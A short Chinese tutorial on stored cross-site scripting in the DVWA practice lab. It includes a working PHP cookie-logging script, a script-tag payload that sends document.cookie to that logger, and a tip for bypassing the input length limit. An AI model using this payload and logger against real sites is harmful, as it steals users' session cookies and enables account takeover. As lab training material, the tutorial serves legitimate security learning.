赞
踩
实战更能体验收获!!!
1.phpstudy
2.dvwa靶场
首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:
- <?php
- $cookie = $_GET['cookie'];
- $ip = getenv ('REMOTE_ADDR');
- $time = date('Y-m-d g:i:s');
- $fp = fopen("cookie.txt","a");
- fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
- fclose($fp);
- ?>
然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。
payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>
但是此关卡有长度限制,简单直接前端改一下长度即可:
50改为1000
刷新一下网页
然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP
实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。